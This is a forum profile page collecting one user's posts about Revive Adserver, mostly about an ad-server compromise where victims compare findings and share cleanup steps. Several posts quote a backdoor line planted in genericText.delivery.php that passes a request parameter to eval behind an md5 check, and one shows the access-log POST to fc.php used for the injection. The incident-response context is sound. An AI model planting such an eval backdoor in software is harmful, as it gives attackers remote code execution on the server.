Jump to content

tvvpmi

Approved members
 View Profile  See their activity

  • Posts

    17

  • Joined

  • Last visited

 Content Type 

Posts posted by tvvpmi

  3. Recompiling delivery rules not working after updrade to v5.0

    in Using Revive Adserver

    Posted

    I have upgaded from Revive 4.2.1 to 5.0.0
    After the upgrade I have a lot of banners with cached delivery rules that DO NOT AGREE with the delivery rules for the banner.
    If I save the banner solve the problem.

    If I do a "Delivery Rules Check", I get all banners with this problem. At the bottom I have this message:


    Errors found
    Some inconsistancies were found above, you can repair these using the button below, this will recompile the compiled limitation for every banner/delivery rule set in the system

    Executing the "Recompile" action does nothing.

    The only action that solves the problem is to save each banner individually.

    Banners-Delivery-Rules.png

  5. revive Asynchronous JS hacked

    in Off Topic

    Posted

    6 hours ago, TYWebmaster said:

    Has any of this been resolved? How are they getting back into the DB and making changes. I had varchar(0) on append/prepend on all zones and today its been changed back and the code is back in the Zones.

    If prepend/append zones are varchar(0), they can't insert code there for sure. Check if the code is inserted in prepend/append fields of the banners table. As I post before, if the injection is done using the same strategy, you can stop it making the file "plugins/bannerTypeText/oxText/genericText.delivery.php" read only. Another good measure is to disable PHP execution on delivery images folder.

  6. revive Asynchronous JS hacked

    in Off Topic

    Posted

    Yes. Timestamps has been changed as well. You can use linux commd "stat" to see the modification and change time stamps. Attacker is changing "modification time" to parent folder "modification time" so as not to raise suspicion

    This code is inserted via a POST call to fc.php. To avoid to be reinfected you can change write permisions on "plugins/bannerTypeText/oxText/genericText.delivery.php".

    Perhaps some revive developer can tell us, what is the function of fc.php (front controller) to decide if we can disable it or not.

  7. Mobile ads have been hijacked

    in Using Revive Adserver

    Posted

    Hi @vinmhas, I was in the same situation. You should review your file: plugins/bannerTypeText/oxText/genericText.delivery.php

    Problably it has been modified, adding a line like this at the end:

    if(isset($_REQUEST['oxText'])&&md5($_REQUEST['oxText'])=='2817bce4ce1ba4d9361f5f24cf33747f'){@eval($_REQUEST['zoneId']);}

    You have to remove it. 

    Also you have to search in the "images folder", for some php script ... and remove it. Perhaps you can send it privately to @Ian vM

    Clean the prepend code of your zones ...  via sql o through the revive backend. Search for iframes and javascript codes.

    Disable PHP execution on image folder or move image folder to "another place" as they are static files and serve them throught another subdomain. You don't need PHP for them

  10. Mobile ads have been hijacked

    in Using Revive Adserver

    Posted

    16 hours ago, tvvpmi said:

    I have modify the fc.php script to log post parameters. I'm waiting now for a new POST to check what we are receiving and to try reproduce the attack

    I have more info. I just have received another attack just now. I have the POST parameters the attacker is using. Some of admin is interested in receiving them?

  11. Mobile ads have been hijacked

    in Using Revive Adserver

    Posted

    15 minutes ago, tvvpmi said:

    Same here.

    From stat genericText.delivery.php
     2018-12-22 08:51:50.724940460 +0100

    Like in @snaggy case, this line has been added at the end of genericText.delivery.php

    if(isset($_REQUEST['oxText'])&&md5($_REQUEST['oxText'])=='2817bce4ce1ba4d9361f5f24cf33747f'){@eval($_REQUEST['zoneId']);}

  12. Mobile ads have been hijacked

    in Using Revive Adserver

    Posted

    3 hours ago, sunech said:

    Sorry @Matteo Beccati, didn't see your e-mail. I have deleted the line below from genericText.delivery.php now:
    if(isset($_REQUEST['oxText'])&&md5($_REQUEST['oxText'])=='ae897e2de15145e2089d89aff19b78a7'){@eval($_REQUEST['zoneId']);}
    Thank you for your assistance!

    I checked the file via stat and can see that it was changed December 22nd 2018 at 00:33, despite the modified timestamp matching the revive installation.
    @Snaggy / @tvvpmi could you check if it is the same with your genericText.delivery.php and if so, if you have log data for the time it was changed?

    Same here.

    From stat genericText.delivery.php
     2018-12-22 08:51:50.724940460 +0100

  13. Mobile ads have been hijacked

    in Using Revive Adserver

    Posted

    6 hours ago, Ian vM said:

    @tvvpmi which version are you running ? did you upgrade from an older version in the past too ?

    Last one 4.1.4

    I have upgrade from prior version. But this instalation comes from an old instalation. 2.8 series

     

    I have modify the fc.php script to log post parameters. I'm waiting now for a new POST to check what we are receiving and to try reproduce the attack

  14. Mobile ads have been hijacked

    in Using Revive Adserver

    Posted

    CONFIRMED the point of code injection un the prepend zones are the same @sunech has previously report

    [06/Jan/2019:12:22:53 +0100] "POST /www/delivery/fc.php?zoneid=0&script=bannerTypeText:oxText:genericText&Charset=UTF8&target=blank HTTP/1.1" 200 23 "https://google.com/serach?q=https://<adserver>/www/delivery&aqs=chrome.1.69i57j0j7&sourceid=chrome&ie=UTF-8" "AdsBot-Google (+http://www.google.com/adsbot.html)"

  16. Insert ads into Google Accelerated Mobile Pages (html AMP)

    in Feature Requests

    Posted

    Yes. I know that. I have been using OpenX Source for a los time and before that phpadsnew, and now Revive Adserver.

    With new OpenX I want to mean that company. I don't know what software they are using in their services.

    Reading the link

    https://github.com/ampproject/amphtml/blob/master/ads/openx.md

    you can see that there is a parameter to set the host where the adserver is running. That makes me think that  OpenX was the open source OpenX. 

    Of course i have try it with my private versión of OpenX and don't work.

    Inserting javascripts inside the AMP works. I have to try what happens when the page is cached at google amp cache 

×
×
  • Create New...